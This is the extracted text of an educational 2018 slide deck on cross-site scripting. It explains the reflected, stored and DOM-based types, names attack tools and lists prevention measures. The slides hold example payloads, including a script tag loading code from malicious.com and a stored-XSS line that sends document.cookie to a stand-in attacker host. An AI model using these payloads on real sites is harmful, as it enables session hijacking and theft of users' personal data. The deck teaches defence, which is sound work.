WARNING – YOU’VE BEEN
XSSED!
SMARTTALK
Quick facts
-
82%
of web applications are
vulnerable
to XSS (2013)
, 2/6/2018
APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW
Page 2
-
7 out of 10
web applications are
vulnerable
to XSS (2014)
-
60%
web applications are
vulnerable
to XSS (2013)
-
#3
in
OWASP TOP-10
(2013)
Please welcome – XSS!
06.02.2018
/
3
•
What is XSS
–
XSS – Cross-Site Scripting
–
It is an
attack
against users of vulnerable webapp
•
Goal
–
Execute code (JavaScript) in victim’s browser in context attacking
webapp
How it WORKS???
06.02.2018
/
4
Link with hidden code
Personal Data
WWW.SUPERBANK.ORG
XSS Types
•
By attacking vector
-
Reflected or passive XSS (Type 1)
-
Stored or active XSS (Type 2)
-
DOM Based XSS (Type 0)
, 2/6/2018
APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW
Page 5
•
By injection channel
-
Browser errors/bugs
-
Lack of input validation filtering
-
Substitution of page encoding
Reflected XSS
, 2/6/2018
APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW
Page 6
WWW.SUPERBANK.ORG
Login
*******
Hi Mr. Pibody,
Please check our monthly report on our site:
http://www.superbank.org/rep_page.aspx?mothly=<script
scr=“http://malicious.com/sc.js”></script>
www.malicious.com
Victim loads
JavaScript
from site
Stored XSS
, 2/6/2018
APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW
Page 7
Login
*******
WWW.SUPERBANK.ORG
www.malicious.com
Access to report with
employees “comments”
Inject active content
to report’s “comments”
Iteresting report!!!<script>document.write(‘<img
src=“http://www.malicious.com/evilsmile.gif?’ +
escape(document.cookie)
+’”/>’)</script>
Victim unknownly sends cookie to www.malicious.com
Attacker can now work on behalf victim
using session ID from cookie
DOM Based XSS
, 2/6/2018
APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW
Page 8
•
Webpages modifies the DOM (Document Object Model)
•
Hard to find
<body>
<script>document.write(location.href);</script>
</body>
Simple HTML DOM tree
Example of simple vulnerable HTML
How to exploit???
http://site.com/test.html#<script>alert(‘xss’);</script>
DOM
XSS WiKi
How XSS can be used
, 2/6/2018
APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW
Page 9
•
Stealing COOKIES
-
Session HighJacking
-
Personal data stealing
-
Unauthorized access to webapp
-
Reputation loss
•
Stealing forms
-
Personal data stealing
-
Unauthorized access to webapp
-
Reputation loss
•
DDoS-attack
-
Reputation loss
•
XSS-Worms
-
Personal data stealing
-
Unauthorized access to webapp
-
Reputation loss
Tools
, 2/6/2018
APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW
Page 10
XENOTIX
-
OWASP project
-
Actively developed
-
Multi-browser tests support
-
A lots of other features
-
Freeware
XSSF
-
Metasploit plugin
-
Console based utility
-
Web-based GUI present
-
Creates a communication channel with victim’s browser
-
Freeware
BeEF
-
Powerful security framework with
-
Console based utility
-
Web-based GUI present
-
Simple and powerful API
-
Freeware
DOMinatorPro
-
Scanning Automation
-
Ready Data: Realtime Dynamic Data Tainting
-
Automatic Exploitability Check
-
Shareware
How to prevent?
, 2/6/2018
APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW
Page 11
•
Server-side protection:
–
Input Validation – do NOT trust anything that comes from users (even Cookies)
–
Use HttpOnly flag
–
Use SSL
–
Do not store confidential data in Cookies
–
Encoding of HTML-symbols, JavaScript, CSS and URLs.
–
Use filtering functions (like
filter_sanitize_encoded
,
htmlentities
,
filter_sanitize_magic_quotes
,
etc
) for incoming data filtering
–
Use different libraries for incoming data encoding (
HTML Purifier
or
Htmlawed
,
PHP Anti-XSS
Class
,
AntiSamy API
,
XSS-HTML-Filter
)
•
Client-side protection
–
Use plugins for browsers (
NoScript
for FireFox and
NotScripts
Opera and Chrome)
А не поговорить ли нам о XSS!